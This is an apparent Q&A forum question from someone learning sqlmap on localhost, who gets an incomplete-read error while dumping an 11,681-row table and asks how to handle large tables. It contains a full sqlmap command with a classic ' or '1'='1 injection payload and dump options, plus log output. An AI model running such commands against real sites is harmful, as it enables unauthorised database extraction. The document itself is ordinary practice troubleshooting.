1

I am learning/working on sqlmap and I was trying to dump a large table with 11K entries on my localhost.

The command I used is:

python sqlmap.py -u "http://localhost/searchre.php" --data="search=' or '1'='1" 
--delay=10 --timeout=100 --random-agent --dump -D Animal -T types --keep-alive --threads=5

It is supposed to dump the types table from the Animal database.

[12:29:36] [INFO] the SQL query used returns 11681 entries

[12:29:36] [INFO] starting 5 threads

[12:29:48] [CRITICAL] there was an incomplete read error while retrieving data 
from the target URL or proxy. sqlmap is going to retry the request(s)

[12:29:48] [WARNING] if the problem persists please try to lower the number of 
used threads (option '--threads')

I tried lowering the threads but all in vain. What should I do in a scenario where the table size is large?

schroeder
  • 123,438
  • 55
  • 284
  • 319
Johnny
  • 181
  • 1
  • 4
  • 11

0 Answers0